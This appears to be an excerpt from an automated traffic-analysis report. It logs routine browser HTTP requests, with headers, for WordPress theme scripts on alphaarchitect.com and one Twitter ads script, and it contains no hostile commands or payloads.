Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tooltip.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-general-global.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-general-footer.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-quantity.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-parallax.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/swiper.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-general.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-crossfade-images.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-lightbox.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-youtube.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-menu.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-mega-menu.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-general-global.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-general-footer.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-quantity.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-background-slider.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-crossfade-images.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-animations.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-title.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-button.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-container.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-widget-areas.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
